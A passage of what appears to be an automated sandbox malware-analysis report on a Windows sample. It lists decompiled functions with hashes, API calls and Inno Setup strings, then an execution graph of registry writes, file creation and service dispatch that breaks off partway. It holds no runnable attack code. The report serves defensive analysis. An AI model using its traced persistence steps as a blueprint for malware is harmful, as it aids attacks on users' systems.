                                                                          • Opcode ID: 399c937e83af8c9a67e0d61dfb0eea40f0b910730a113ae452a6132c876950b5
                                                                          • Instruction ID: 850bb8641a739d3fa0e3e078eaa16554ae15adb015fc2a4b55b093a82efb48cd
                                                                          • Opcode Fuzzy Hash: 399c937e83af8c9a67e0d61dfb0eea40f0b910730a113ae452a6132c876950b5
                                                                          • Instruction Fuzzy Hash: DA31C3B17002249BCB11EF79D4817AFB7A5EFC4304F9545ABE8049B386D7789D80CA9D
                                                                          Strings
                                                                          • Failed to proceed to next wizard page; showing wizard., xrefs: 0046BD6B
                                                                          • Failed to proceed to next wizard page; aborting., xrefs: 0046BD57
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Failed to proceed to next wizard page; aborting.$Failed to proceed to next wizard page; showing wizard.
                                                                          • API String ID: 0-1974262853
                                                                          • Opcode ID: 2243244884f8f0dbacf357e303b6debe926f1333eeaeef60402ffea89cf8a6c6
                                                                          • Instruction ID: 41ea3916521a7a624eafe14c23fd6f628d308964d0d2c815b7cc35631b26c174
                                                                          • Opcode Fuzzy Hash: 2243244884f8f0dbacf357e303b6debe926f1333eeaeef60402ffea89cf8a6c6
                                                                          • Instruction Fuzzy Hash: 6D31CE306042049FD711EB69EA85B9977E4EB15304F1440BFF804DB3A2EB386E80CB8A
                                                                          APIs
                                                                            • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
                                                                          • RegCloseKey.ADVAPI32(?,00477A26,?,?,00000001,00000000,00000000,00477A41), ref: 00477A0F
                                                                          Strings
                                                                          • %s\%s_is1, xrefs: 004779B8
                                                                          • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 0047799A
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CloseOpen
                                                                          • String ID: %s\%s_is1$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                                          • API String ID: 47109696-1598650737
                                                                          • Opcode ID: 06886a66f565e0468b769e4592232cec9d6989d0309b3619cbd247b7a06007c3
                                                                          • Instruction ID: 9c5288f04ac2681b3320032c051d60ba9bbc132f2e03367f89e393ba1652dadd
                                                                          • Opcode Fuzzy Hash: 06886a66f565e0468b769e4592232cec9d6989d0309b3619cbd247b7a06007c3
                                                                          • Instruction Fuzzy Hash: 49216174B042046FEB01DBA9CC51A9EBBE8EB89704F90847AE504E7381D6789A058B58
                                                                          APIs
                                                                          • SendMessageA.USER32(00000000,0000044B,00000000,?), ref: 0044FA1D
                                                                          • ShellExecuteA.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 0044FA4E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: ExecuteMessageSendShell
                                                                          • String ID: open
                                                                          • API String ID: 812272486-2758837156
                                                                          • Opcode ID: ee44408f46f22df0a1b012607f151a7a203705d09399f4342952afd6ee530704
                                                                          • Instruction ID: 219036bbd933cc3ca485a607602a83352c0bb437124d4d28150632e42eb7a986
                                                                          • Opcode Fuzzy Hash: ee44408f46f22df0a1b012607f151a7a203705d09399f4342952afd6ee530704
                                                                          • Instruction Fuzzy Hash: DD213071E00204AFEB00DFA9C881B9EB7F9EB84704F60857AB405F7291D778EA45CB58
                                                                          APIs
                                                                          • RtlEnterCriticalSection.KERNEL32(0049A420,00000000,)), ref: 004025C7
                                                                          • RtlLeaveCriticalSection.KERNEL32(0049A420,0040263D), ref: 00402630
                                                                            • Part of subcall function 004019CC: RtlInitializeCriticalSection.KERNEL32(0049A420,00000000,00401A82,?,?,0040222E,02381A68,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                            • Part of subcall function 004019CC: RtlEnterCriticalSection.KERNEL32(0049A420,0049A420,00000000,00401A82,?,?,0040222E,02381A68,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                            • Part of subcall function 004019CC: LocalAlloc.KERNEL32(00000000,00000FF8,0049A420,00000000,00401A82,?,?,0040222E,02381A68,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                            • Part of subcall function 004019CC: RtlLeaveCriticalSection.KERNEL32(0049A420,00401A89,00000000,00401A82,?,?,0040222E,02381A68,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                                          • String ID: )
                                                                          • API String ID: 2227675388-1084416617
                                                                          • Opcode ID: 88dd2724dbd3ff1c3207952c5660733b34460a855d8f77796fd9f5c01a3a41c6
                                                                          • Instruction ID: e822125da835f5420473686c3c07f3a27ad935215509521471bf00a9407fd077
                                                                          • Opcode Fuzzy Hash: 88dd2724dbd3ff1c3207952c5660733b34460a855d8f77796fd9f5c01a3a41c6
                                                                          • Instruction Fuzzy Hash: 2311EF317042046EEB25AF799E1A62A6AD497D575CB24487BF804F32D2D9FD8C0282AD
                                                                          APIs
                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097), ref: 00494FC5
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Window
                                                                          • String ID: /INITPROCWND=$%x $@
                                                                          • API String ID: 2353593579-4169826103
                                                                          • Opcode ID: 4dd764281e3e5bd3fffa96cfa0153c2ea98d45f8120ac28787629669d01cae7f
                                                                          • Instruction ID: dd767cc37dfd13d2cdbde0042d97f8edd346c26068944a47342b43ccbe763047
                                                                          • Opcode Fuzzy Hash: 4dd764281e3e5bd3fffa96cfa0153c2ea98d45f8120ac28787629669d01cae7f
                                                                          • Instruction Fuzzy Hash: 8C11D531A042498FDF01DBA5E851BAEBBE8EB49308F20447BE504E7282D73D99058B98
                                                                          APIs
                                                                            • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                            • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                          • SysFreeString.OLEAUT32(?), ref: 00446D1A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: String$AllocByteCharFreeMultiWide
                                                                          • String ID: NIL Interface Exception$Unknown Method
                                                                          • API String ID: 3952431833-1023667238
                                                                          • Opcode ID: 7e876c1741d6a4ab732274b2805af96121c7add3bd5ed47b260724fdb6465e77
                                                                          • Instruction ID: bb0b80e2a380756916404604f3e22b1e01578a82bc6816b9b9cc7d380a4acf04
                                                                          • Opcode Fuzzy Hash: 7e876c1741d6a4ab732274b2805af96121c7add3bd5ed47b260724fdb6465e77
                                                                          • Instruction Fuzzy Hash: D811D671B042089FEB04DFA59D41AAEBBACEB49304F52003EF500E7281DA799D04C62E
                                                                          APIs
                                                                          • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,004948C4,?,004948B8,00000000,0049489F), ref: 0049486A
                                                                          • CloseHandle.KERNEL32(00494904,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,004948C4,?,004948B8,00000000), ref: 00494881
                                                                            • Part of subcall function 00494754: GetLastError.KERNEL32(00000000,004947EC,?,?,?,?), ref: 00494778
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CloseCreateErrorHandleLastProcess
                                                                          • String ID: D
                                                                          • API String ID: 3798668922-2746444292
                                                                          • Opcode ID: 25970fbfba956000743cd3c8178cfbc98a37ab1c0a0b6db99df0911e7524530c
                                                                          • Instruction ID: 06a552fcbca6defc8fdbe432d7558d6d49acb7d91bb7665b8ba999baae494250
                                                                          • Opcode Fuzzy Hash: 25970fbfba956000743cd3c8178cfbc98a37ab1c0a0b6db99df0911e7524530c
                                                                          • Instruction Fuzzy Hash: D4015EB5604688AFDF14EBE1CC42E9EBBACDF88714F51007AF504E72D1D6789E068628
                                                                          APIs
                                                                          • RegQueryValueExA.ADVAPI32(?,Inno Setup: No Icons,00000000,00000000,00000000,00000000), ref: 0042DCA0
                                                                          • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,Inno Setup: No Icons,00000000,00000000,00000000), ref: 0042DCE0
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Value$EnumQuery
                                                                          • String ID: Inno Setup: No Icons
                                                                          • API String ID: 1576479698-2016326496
                                                                          • Opcode ID: a6034a78eb6f28d82538eb73d6f8d4d4ecfcbebd89183b5d88f6193e65cc5de6
                                                                          • Instruction ID: 57ddeb90a82b523466695c0d6df077a59cb4ba665f60dcca1a1637bef7e5778e
                                                                          • Opcode Fuzzy Hash: a6034a78eb6f28d82538eb73d6f8d4d4ecfcbebd89183b5d88f6193e65cc5de6
                                                                          • Instruction Fuzzy Hash: 19012B31B4533069F73085167D01F7B668C8B82B64F64003BF941EA3C0D6D99C04D36E
                                                                          APIs
                                                                            • Part of subcall function 0047BB30: FreeLibrary.KERNEL32(6F940000,0047FFE2), ref: 0047BB46
                                                                            • Part of subcall function 0047B804: GetTickCount.KERNEL32 ref: 0047B84C
                                                                            • Part of subcall function 0045648C: SendMessageA.USER32(00000000,00000B01,00000000,00000000), ref: 004564AB
                                                                          • GetCurrentProcess.KERNEL32(00000001,?,?,?,?,00496E1F), ref: 0049651D
                                                                          • TerminateProcess.KERNEL32(00000000,00000001,?,?,?,?,00496E1F), ref: 00496523
                                                                          Strings
                                                                          • Detected restart. Removing temporary directory., xrefs: 004964D7
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Process$CountCurrentFreeLibraryMessageSendTerminateTick
                                                                          • String ID: Detected restart. Removing temporary directory.
                                                                          • API String ID: 1717587489-3199836293
                                                                          • Opcode ID: 41ea43b9c99f94dd411f6220533ab33a70ff77999e7e1cd773f2c523df5ecd5d
                                                                          • Instruction ID: ef6d07dd072ead5de2427941989604cf9fc91a718c8df879baec15603ccd013a
                                                                          • Opcode Fuzzy Hash: 41ea43b9c99f94dd411f6220533ab33a70ff77999e7e1cd773f2c523df5ecd5d
                                                                          • Instruction Fuzzy Hash: BFE0ED722086007EDA0277BABC16A1B3F5CDB8677C793083BF90882543CA2D8804D6BD
                                                                          APIs
                                                                            • Part of subcall function 00406F58: DeleteFileA.KERNEL32(00000000,0049A628,00496BB5,00000000,00496C0A,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F63
                                                                          • ReleaseMutex.KERNEL32(00000000,00496C11,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00496C2C,?,?,00000000), ref: 00496BFB
                                                                          • CloseHandle.KERNEL32(00000000,00000000,00496C11,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00496C2C), ref: 00496C04
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CloseDeleteFileHandleMutexRelease
                                                                          • String ID: $pI$.lst$.msg$/REG$/REGU$Inno-Setup-RegSvr-Mutex$Setup$oI$oI
                                                                          • API String ID: 3841931355-3392794427
                                                                          • Opcode ID: 85745e2bf96711d5edcd0282694dbca5b76b44631e5b8e912023d4d1f59fa348
                                                                          • Instruction ID: 9d4ffa1f72b1828a9bd2e7b92801d6c81e017e55b738e106198dcdadd1a8305d
                                                                          • Opcode Fuzzy Hash: 85745e2bf96711d5edcd0282694dbca5b76b44631e5b8e912023d4d1f59fa348
                                                                          • Instruction Fuzzy Hash: B6F0A7316086549EDF05ABA5E82296E7BA8FB48314F63087BF404E65C0D53C5C10CA2C
                                                                          APIs
                                                                          • SetFocus.USER32(00000000,+qI,00000000,00421A84,00000000,00000000,00418608,00000000,00000001,?,?,00464ADA,00000001,00000000,00000000,0046A045), ref: 00421D5B
                                                                          • GetFocus.USER32 ref: 00421D69
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Focus
                                                                          • String ID: +qI
                                                                          • API String ID: 2734777837-4068327824
                                                                          • Opcode ID: 9e37e0b92800fb026ee4c04a9331c4adaa629c94db3b91cf1937ec1872e30d90
                                                                          • Instruction ID: 7c51ddb3d8c31a7125e72aada4db547e67c97af2ef3b4f9e878502f62af25610
                                                                          • Opcode Fuzzy Hash: 9e37e0b92800fb026ee4c04a9331c4adaa629c94db3b91cf1937ec1872e30d90
                                                                          • Instruction Fuzzy Hash: EAE04831710211A7DB1036796C857EB11855B64344F55947FF546DB263DE7CDC85068C
                                                                          APIs
                                                                          • GetSystemTimeAsFileTime.KERNEL32(00000000,0049A628), ref: 00456C11
                                                                          • FileTimeToSystemTime.KERNEL32(00000000,$pI,00000000,0049A628), ref: 00456C28
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Time$FileSystem
                                                                          • String ID: $pI
                                                                          • API String ID: 2086374402-3761944556
                                                                          • Opcode ID: 3f9a07e309d28d3ed69bb25488f66f46ea45110b2c662fe6765c70228e66d0e6
                                                                          • Instruction ID: 229b1bfa25ea94c428731b1611971c6890b9b5f6c230ce37e6a86d23df0ccc86
                                                                          • Opcode Fuzzy Hash: 3f9a07e309d28d3ed69bb25488f66f46ea45110b2c662fe6765c70228e66d0e6
                                                                          • Instruction Fuzzy Hash: DFD05B7340830C66CF01F1E5AC82CCFB79CD504324F100677A118A25C1FE39A654565C
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLastSleep
                                                                          • String ID:
                                                                          • API String ID: 1458359878-0
                                                                          • Opcode ID: b3d8df4fac529f1e6ef3b03e70e70f14952c107ad600f92b177c80a496392a1c
                                                                          • Instruction ID: 9275ee504a9eb35dba3a5523cc5197587f06a42b27f59d217f7189e04cd8cbf1
                                                                          • Opcode Fuzzy Hash: b3d8df4fac529f1e6ef3b03e70e70f14952c107ad600f92b177c80a496392a1c
                                                                          • Instruction Fuzzy Hash: 1FF024B6B04514678F20E99FD881B2F62CCDAD836E710012BFC04DF343C438EE8986A9

                                                                          Execution Graph

                                                                          Execution Coverage:21.7%
                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                          Signature Coverage:13.5%
                                                                          Total number of Nodes:399
                                                                          Total number of Limit Nodes:7
                                                                          execution_graph 2499 404b30 2500 404b38 2499->2500 2501 404bca 2500->2501 2503 404a40 RtlUnwind 2500->2503 2504 404a58 2503->2504 2504->2500 2036 402f72 GetVersion 2061 4032aa HeapCreate 2036->2061 2038 402fd1 2039 402fd6 2038->2039 2040 402fde 2038->2040 2161 40308d 2039->2161 2073 404892 2040->2073 2044 402fe6 GetCommandLineA 2087 404760 2044->2087 2048 403000 2119 40445a 2048->2119 2050 403005 2051 40300a GetStartupInfoA 2050->2051 2132 404402 2051->2132 2053 40301c GetModuleHandleA 2136 4026f0 GetModuleHandleA GetModuleFileNameA 2053->2136 2056 403040 2167 4041a9 2056->2167 2062 403300 2061->2062 2063 4032ca 2061->2063 2062->2038 2174 403162 2063->2174 2066 4032e6 2068 403303 2066->2068 2188 403b58 2066->2188 2067 4032d9 2186 403307 HeapAlloc 2067->2186 2068->2038 2071 4032e3 2071->2068 2072 4032f4 HeapDestroy 2071->2072 2072->2062 2251 402ec0 2073->2251 2075 4048b1 GetStartupInfoA 2083 4049c2 2075->2083 2086 4048fd 2075->2086 2079 4049e9 GetStdHandle 2082 4049f7 GetFileType 2079->2082 2079->2083 2080 404a29 SetHandleCount 2080->2044 2081 402ec0 12 API calls 2081->2086 2082->2083 2083->2079 2083->2080 2084 40496e 2084->2083 2085 404990 GetFileType 2084->2085 2085->2084 2086->2081 2086->2083 2086->2084 2088 40477b GetEnvironmentStringsW 2087->2088 2089 4047ae 2087->2089 2090 404783 2088->2090 2091 40478f GetEnvironmentStrings 2088->2091 2089->2090 2093 40479f 2089->2093 2094 4047c7 WideCharToMultiByte 2090->2094 2095 4047bb GetEnvironmentStringsW 2090->2095 2092 402ff6 2091->2092 2091->2093 2110 404513 2092->2110 2093->2092 2096 404841 GetEnvironmentStrings 2093->2096 2097 40484d 2093->2097 2099 4047fb 2094->2099 2100 40482d FreeEnvironmentStringsW 2094->2100 2095->2092 2095->2094 2096->2092 2096->2097 2101 402ec0 12 API calls 2097->2101 2102 402ec0 12 API calls 2099->2102 2100->2092 2108 404868 2101->2108 2103 404801 2102->2103 2103->2100 2104 40480a WideCharToMultiByte 2103->2104 2106 404824 2104->2106 2107 40481b 2104->2107 2105 40487e FreeEnvironmentStringsA 2105->2092 2106->2100 2317 4030b1 2107->2317 2108->2105 2111 404525 2110->2111 2112 40452a GetModuleFileNameA 2110->2112 2347 40588b 2111->2347 2114 40454d 2112->2114 2115 402ec0 12 API calls 2114->2115 2116 40456e 2115->2116 2117 40457e 2116->2117 2118 403068 7 API calls 2116->2118 2117->2048 2118->2117 2120 404467 2119->2120 2122 40446c 2119->2122 2121 40588b 19 API calls 2120->2121 2121->2122 2123 402ec0 12 API calls 2122->2123 2124 404499 2123->2124 2125 403068 7 API calls 2124->2125 2130 4044ad 2124->2130 2125->2130 2126 4044f0 2127 4030b1 7 API calls 2126->2127 2128 4044fc 2127->2128 2128->2050 2129 402ec0 12 API calls 2129->2130 2130->2126 2130->2129 2131 403068 7 API calls 2130->2131 2131->2130 2133 40440b 2132->2133 2135 404410 2132->2135 2134 40588b 19 API calls 2133->2134 2134->2135 2135->2053 2371 402dd0 2136->2371 2141 402776 lstrcmpiW 2143 402788 2141->2143 2144 4027ed lstrcmpiW 2141->2144 2142 402948 StartServiceCtrlDispatcherA 2142->2056 2143->2142 2152 4027a7 2143->2152 2157 4027e8 2143->2157 2145 402805 2144->2145 2146 40289c lstrcmpiW 2144->2146 2377 402548 2145->2377 2146->2142 2147 4028ae RegCreateKeyExA 2146->2147 2149 4028d0 2147->2149 2150 40292f SetEvent 2147->2150 2156 4028e2 GetTickCount wsprintfA RegSetValueExA RegCloseKey 2149->2156 2396 402351 2150->2396 2159 4027bc CreateFileA CloseHandle ExitProcess 2152->2159 2154 402812 RegCreateKeyExA 2154->2142 2155 402838 2154->2155 2160 40284a GetTickCount wsprintfA RegSetValueExA RegCloseKey 2155->2160 2156->2150 2157->2142 2160->2142 2162 403096 2161->2162 2163 40309b 2161->2163 2164 404c10 7 API calls 2162->2164 2165 404c49 7 API calls 2163->2165 2164->2163 2166 4030a4 ExitProcess 2165->2166 2456 4041cb 2167->2456 2170 40427e 2171 40428a 2170->2171 2172 4043b3 UnhandledExceptionFilter 2171->2172 2173 40305a 2171->2173 2172->2173 2197 402da0 2174->2197 2177 4031a5 GetEnvironmentVariableA 2181 4031c4 2177->2181 2185 403282 2177->2185 2178 40318b 2178->2177 2180 40319d 2178->2180 2180->2066 2180->2067 2182 403209 GetModuleFileNameA 2181->2182 2183 403201 2181->2183 2182->2183 2183->2185 2199 404d9c 2183->2199 2185->2180 2202 403135 GetModuleHandleA 2185->2202 2187 403323 2186->2187 2187->2071 2189 403b65 